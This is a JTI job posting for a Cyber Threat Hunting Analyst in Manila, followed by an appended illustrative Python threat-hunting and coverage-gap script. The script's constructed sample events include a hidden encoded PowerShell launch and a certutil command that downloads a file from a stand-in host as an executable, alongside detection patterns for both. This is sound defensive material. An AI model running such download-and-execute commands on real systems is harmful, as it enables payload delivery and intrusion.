Cyber Threat Hunting Analyst


xpatjobs       |    Location:Makati , Metro Manila       |    Country:Philippines


We're JTI, Japan Tobacco International, and we believe in freedom. We think that the possibilities are limitless when you're free to choose. We've spent the last 20 years innovating and creating new and better products for our consumers to choose from. It's how we've grown to be present in 130 countries, and how we've grown from 40 to 4,000+ employees in the Philippines since 2009. But our business isn't just business, our business is our people. Their talent. Their potential. We believe that when they're free to be themselves, to grow, travel and develop, amazing things can happen for our business. That's why our employees, from around the world, choose to be a part of JTI. It's why 9 out of 10 would recommend us to a friend, and why we've been recognized as INVESTORS IN PEOPLE in the Philippines. It's the perfect moment for you to #JoinTheIdea. We're opening our Global Business Service center in the heart of BGC Manila and looking for more than 300 bright minds to join a global multinational with an exciting start-up vibe.

This advertisement will remain available until the role is filled.

Cyber Threat Hunting Analyst

This position exists to support the Cyber Threat Hunting Manager in implementing processes and technologies for the early detection of potential security threats. The Cyber Threat Hunting Analyst will contribute to the definition, implementation and maintenance of the Threat Detection and Hunting service according to relevance, potential impact and risks. Additionally, the Analyst will:

1. Contribute to correlating threat actor profiles and TTPs with attack vectors to develop new use cases or hypotheses for hunting campaigns.
2. Provide support to ensure the service is adequately delivered together with our MSSP provider and consistently integrated with the other security platforms and services.
3. Collaborate to enhance and maintain the partnership with other Information Security functions to deliver shared outcomes that measurably improve JTI SOC efficiency in detecting and responding to threats.
4. Create reports and propose corrective actions to enhance the IT security posture.

Desirable: certifications (any security certification, such as but not limited to): CEH, CISSP, OSCP, GIAC

What will you do?

1. Threat Detection
- Support the log onboarding process and contribute to the implementation of new monitoring use cases along with their lifecycle.
- Support the creation of visibility/detection coverage mappings and the identification of gaps in detecting relevant threats, actors and tools.
- Provide security monitoring backup to ensure no security detections are missed.

2. Threat Hunting
- Support Threat Hunting program creation, maintenance and continuous improvement.
- Contribute to the creation of threat hunting hypotheses.
- Participate in Threat Hunting activities based on TTPs and IOCs triggered by CTI, threat hunting hypotheses, security monitoring, incident response or others.
- Contribute to the development of new monitoring use cases based on threat hunting results.

3. Cross-functional collaboration
- Participate in Threat Modelling in conjunction with Cyber Threat Intelligence functions.
- Support Incident Response during significant or major Security Incidents, collaborate in the creation of triage playbooks and collaborate in reducing the number of false positives.
- Collaborate with TSC on security product enhancement or the resolution of problems/misconfigurations.

4. Third-Party collaboration
- Collaborate and align with the security vendor/MSSP provider to ensure that service delivery and support meet performance and business objectives.

5. Reporting
- Participate in the creation of reporting based on metrics to measure the effectiveness of the Threat Detection and Hunting service.

Who are we looking for?

- University Degree in Computer Science or a related field.
- 1+ years of relevant experience as a member of a Threat Detection, Hunting, Incident Response, Malware Analysis, or similar role. Previous Red/Purple Teamer experience is a plus.
- Good understanding of Cybersecurity fundamentals, Threat Landscape, Attack Vectors, Threat Actors and their Tactics, Techniques and Procedures.
- Familiarity or background in Intelligence Driven Defense, Cyber Kill Chain methodology, and/or the MITRE ATT&CK framework.
- Knowledge of security platforms (XDR, IDS/IPS, WAF, etc.). Experience with Microsoft products is a plus, e.g. Microsoft Defender for Endpoint.
- Relevant experience with SIEM and Data Lake search languages (Splunk and the Microsoft suite are a plus).
- Knowledge of Windows system internals, Web Applications and APIs.
- Familiarity with nation state, criminal, and financially motivated actor groups.
- A proven track record in protecting large global and distributed organisations.
- Scripting skills are a plus.

What are the next steps?

Thank you for applying! We will make sure to provide you with feedback within the next two weeks.
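The Threat Detection and Threat Hunting duties listed above (TTP-driven hunting hypotheses, detection-coverage mappings, and gap identification) shown in working form, as an added example that is not part of the original posting and not JTI's or its MSSP's tooling. Everything in it is constructed for illustration: the endpoint events, the predicate-to-technique pairing, the actor TTP list and the existing use-case list are assumptions; only the ATT&CK technique IDs themselves are real identifiers.

```python
"""Hypothesis-driven hunt over constructed process-creation telemetry, plus a
detection-coverage gap report. Added example; not the posting's or JTI's code.
Event fields, hypothesis names and technique pairings are assumptions."""

from collections import defaultdict

# Constructed sample events (not real logs). The shape loosely mirrors a
# process-creation event exported from an EDR or SIEM.
EVENTS = [
    {"host": "fin-ws-07", "user": "jdoe", "parent": "WINWORD.EXE",
     "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A"},
    {"host": "fin-ws-07", "user": "jdoe", "parent": "explorer.exe",
     "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"host": "hr-ws-12", "user": "asmith", "parent": "EXCEL.EXE",
     "image": "cmd.exe",
     "cmdline": "cmd.exe /c certutil -urlcache -split -f http://10.0.0.5/a.txt a.exe"},
    {"host": "srv-db-01", "user": "svc_backup", "parent": "services.exe",
     "image": "cmd.exe",
     "cmdline": "cmd.exe /c backup.bat"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}


# Hunt hypotheses: a predicate over one event plus the ATT&CK technique the
# hypothesis is meant to surface. The pairing is this example's assumption.
def office_spawns_shell(ev):
    """Office application as parent of a command interpreter (macro/phish lure)."""
    return ev["parent"].lower() in OFFICE_APPS and ev["image"].lower() in SHELLS


def encoded_powershell(ev):
    """PowerShell launched with a base64-encoded command."""
    c = ev["cmdline"].lower()
    return "powershell" in c and (" -enc" in c or " -encodedcommand" in c)


def certutil_download(ev):
    """certutil used as a living-off-the-land downloader."""
    c = ev["cmdline"].lower()
    return "certutil" in c and "-urlcache" in c


HYPOTHESES = {
    "office_spawns_shell": (office_spawns_shell, "T1566.001"),
    "encoded_powershell": (encoded_powershell, "T1059.001"),
    "certutil_download": (certutil_download, "T1105"),
}


def run_hunt(events, hypotheses=HYPOTHESES):
    """Return {hypothesis_name: [host, ...]} for every hypothesis that fired."""
    hits = defaultdict(list)
    for ev in events:
        for name, (pred, _technique) in hypotheses.items():
            if pred(ev):
                hits[name].append(ev["host"])
    return dict(hits)


# Techniques attributed to the (assumed) actor profile, versus techniques the
# current monitoring use cases already cover. Both sets are constructed.
ACTOR_TTPS = {"T1566.001", "T1059.001", "T1105", "T1003.001", "T1021.001"}
EXISTING_USE_CASES = {"T1059.001", "T1021.001"}


def coverage_gaps(actor_ttps, use_cases, hypotheses=HYPOTHESES):
    """Actor techniques addressed by neither a monitoring use case nor a hunt
    hypothesis: candidates for new detections or the next hunting campaign."""
    hunted = {technique for _pred, technique in hypotheses.values()}
    return sorted(actor_ttps - use_cases - hunted)


if __name__ == "__main__":
    for name, hosts in run_hunt(EVENTS).items():
        print(f"{name}: {sorted(set(hosts))}")
    print("uncovered techniques:", coverage_gaps(ACTOR_TTPS, EXISTING_USE_CASES))
```

The hunt fires three hypotheses on two workstations and leaves one actor technique (credential dumping, T1003.001) with neither a use case nor a hunt behind it, which is exactly the kind of finding the "coverage mapping and gap identification" duty turns into a new monitoring use case. In practice the predicates would be SIEM queries (Splunk SPL or KQL in the Microsoft suite) rather than Python, but the hypothesis-to-technique bookkeeping is the same.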